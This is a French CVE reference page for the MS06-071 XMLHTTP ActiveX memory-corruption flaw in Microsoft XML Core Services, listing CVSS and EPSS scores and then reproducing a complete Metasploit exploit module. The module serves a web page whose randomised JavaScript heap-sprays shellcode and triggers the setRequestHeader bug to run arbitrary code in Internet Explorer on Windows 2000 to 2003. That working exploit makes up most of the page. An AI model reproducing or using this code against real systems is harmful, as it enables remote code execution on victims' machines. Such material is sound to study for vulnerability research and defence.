CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information.
Informations du CVE
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.6
AV:N/AC:H/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
89.83%
–
–
2023-03-12
–
–
–
97.2%
–
2023-04-16
–
–
–
97.37%
–
2023-05-21
–
–
–
97.28%
–
2023-07-02
–
–
–
97.1%
–
2023-08-06
–
–
–
97.36%
–
2023-09-10
–
–
–
97.39%
–
2023-10-22
–
–
–
97.38%
–
2023-11-26
–
–
–
97.14%
–
2024-01-07
–
–
–
97.04%
–
2024-03-31
–
–
–
97.16%
–
2024-06-02
–
–
–
97.16%
–
2024-07-14
–
–
–
97.12%
–
2024-09-29
–
–
–
97.22%
–
2024-12-22
–
–
–
97.24%
–
2025-01-19
–
–
–
97.24%
–
2025-03-18
–
–
–
–
86.69%
2025-03-30
–
–
–
–
87.18%
2025-03-30
–
–
–
–
87.18,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-07-02 22h00 +00:00 Auteur : Metasploit EDB Vérifié : Yes
##
# $Id: ms06_071_xml_core.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer XML Core Services HTTP Request Handling',
'Description' => %q{
This module exploits a code execution vulnerability in Microsoft XML Core Services which
exists in the XMLHTTP ActiveX control. This module is the modifed version of
http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully
tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6
+ Microsoft XML Core Services 4.0 SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Trirat Puttaraksa <trir00t [at] gmail.com>',
],
'Version' => '$Revision: 9669 $',
'References' =>
[
['CVE', '2006-5745' ],
['OSVDB', '29425' ],
['MSB', 'MS06-071' ],
['BID', '20915' ],
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 SP4 -> Windows 2003 SP0', {'Ret' => 0x0c0c0c0c} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 10 2006'))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Get a unicode friendly version of the return address
addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]
# Randomize the javascript variable names
var_buffer = rand_text_alpha(rand(30)+2)
var_shellcode = rand_text_alpha(rand(30)+2)
var_unescape = rand_text_alpha(rand(30)+2)
var_x = rand_text_alpha(rand(30)+2)
var_i = rand_text_alpha(rand(30)+2)
var_size = rand_text_alpha(rand(30)+2)
var_nopsize = rand_text_alpha(rand(30)+2)
var_limit = rand_text_alpha(rand(30)+2)
var_obj = rand_text_alpha(rand(30)+2)
var_id = rand_text_alpha(rand(30)+2)
# Build out the message
content = %Q|
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=#{var_id} classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}">
</object>
<script>
var #{var_unescape} = unescape ;
var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
var #{var_size} = #{var_shellcode}.length * 2;
var #{var_nopsize} = 0x400000 - (#{var_size} + 0x38);
var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
while (#{var_buffer}.length * 2 < #{var_nopsize}) #{var_buffer}+=#{var_buffer} ;
#{var_limit} = (0x12000000 - 0x400000) / 0x400000;
var #{var_x} = new Array() ;
for ( var #{var_i} =0 ; #{var_i} < #{var_limit} ; #{var_i}++ ) {
#{var_x}[ #{var_i} ] =
#{var_buffer} + #{var_shellcode};
}
var #{var_obj} = null;
#{var_obj} = document.getElementById('#{var_id}').object;
try {
#{var_obj}.open(new Array(), new Array(), new Array(), new Array(), new Array());
} catch(e) {};
#{var_obj}.open(new Object(), new Object(), new Object(), new Object(), new Object());
#{var_obj}.setRequestHeader( new Object(), '......' );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
#{var_obj}.setRequestHeader( new Object(), 0x12345678 );
</script>
</body>
</html>
|
content = Rex::Text.randomize_space(content)
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
end